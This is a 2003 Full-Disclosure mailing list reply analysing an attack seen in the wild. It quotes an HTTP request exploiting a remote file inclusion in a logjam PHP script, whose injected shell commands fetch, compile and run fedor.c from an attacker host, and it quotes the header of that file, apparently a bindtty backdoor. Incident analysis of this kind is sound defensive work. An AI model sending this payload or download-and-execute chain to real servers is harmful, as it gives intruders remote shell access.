[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??

To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
From: "kang@insecure.ws" <kang@insecure.ws>
Date: Mon, 24 Nov 2003 11:29:57 +0100

Dan wrote:

Is it just me or is xfteam.net not resolving anyway?

xfteam.net has address 69.56.243.146

Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f

Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
../f


/*
        bindtty - like bindshell, but with tty

        Features:
                - it can handle any number of clients
                - allocates tty for each session
                - no using termios.h/tty.h: compiles on most of gccs
                - linux specific ;(
        
        by sd <sd@sf.cz>
*/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
  - From: Dan <dan@lockedbox.net>

Prev by Date: Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
Next by Date: Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
Previous by thread: Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
Next by thread: Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
Index(es):
- Date
- Thread